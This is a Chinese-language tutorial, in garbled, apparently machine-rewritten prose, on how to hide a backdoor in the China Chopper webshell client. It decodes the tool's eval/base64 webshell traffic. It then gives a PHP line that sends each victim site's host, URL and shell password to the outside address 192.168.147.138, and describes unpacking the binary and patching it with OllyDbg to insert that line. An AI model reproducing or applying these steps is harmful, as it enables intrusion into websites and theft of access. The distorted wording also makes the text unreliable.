黑客是怎么给中国菜刀加入后面的

中国菜刀这儿很少说大伙儿应当了解，也是黑客常常应用的道具，那麼对于该道具黑客如何开展加上有关掩藏侧门呢？下列业界有关学者就来说出大伙儿。

   黑客给中国菜刀加上掩藏侧门方法步骤一：开展开启中国菜刀侧门。当连回目的虚拟主机的当时，大伙儿必须开展实行右健并点选编写文档，更何况就能合理开启掩藏的侧门，具体情况给出图：

      黑客给中国菜刀加上掩藏侧门方法步骤二：开展水果刀的蜕壳。大伙儿必须开展应用peid开展水果刀的蜕壳，还可以手机上找个upx的脱壳工具开展蜕壳。

      黑客给中国菜刀加上掩藏侧门方法步骤三：开展查询数据文件开展剖析步骤，当构建好坏境后大伙儿必须在水果刀中开展右健并先后挑选编写查询某一文档，再开展应用burpsuite开展抓包；其数剧给出：a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JFA9QGZvcGVuKCRGLCJyIik7ZWNobyhAZnJlYWQoJFAsZmlsZXNpemUoJEYpKSk7QGZjbG9zZSgkUCk7O2VjaG8oInw8LSIpO2RpZSgpOw%3D%3D&z1=QzpcXHdhbXBcXHd3d1xccm9ib3RzLnR4dA%3D%3D总共有3个叁数，a url解码后为@eval (base64_decode($_POST[z0]));z0先url解码，在base64转码为：

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);;echo("|

Z1先url解码，在base64转码为：

C:\\wamp\\www\\robots.txt

      这儿略微了解php的人应当也可以看出去，这些编码也是1个读文档的php角本，由水果刀发送至目的虚拟主机上，随后在目的虚拟主机上实行的。 即然编码做为字符串上传带目的虚拟主机上，我可以人们能够再字符串上加上人们想实行的编码，由水果刀一块儿上传以往实行。

if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}

      黑客给中国菜刀加上掩藏侧门方法步骤四：必须开展改动水果刀程序文件。当发觉其字符串占有后，假如开展强行在后边加上侧门字符串得话就会毁坏原先的系统內容，因而得话就必须寻找1个空余的大容量随后再将侧门编码开展装进去；如挑选的地点是4841d0h的空間就必须转换为文档偏位就为841d0h，这就能将侧门字符串：

$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);if(@$_COOKIE['f1']!=95){@setcookie('f1',95);@file_get_contents('http://192.168.147.138/getx.php?caidao='.$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI].'_P='.key($_POST));}置于文档841d0处。

      黑客给中国菜刀加上掩藏侧门方法步骤五：必须在应用OD改动编程代码。网络攻击用到OD开启有关水果刀系统并标记到第四步中字符串入栈的编码处push 0049bae4，还必须将0049bae4地点改动到前边字符串的部位中，还必须能将字符串文档偏位841d0h立即转换为运存偏位4841d0h，详尽的状况给出图：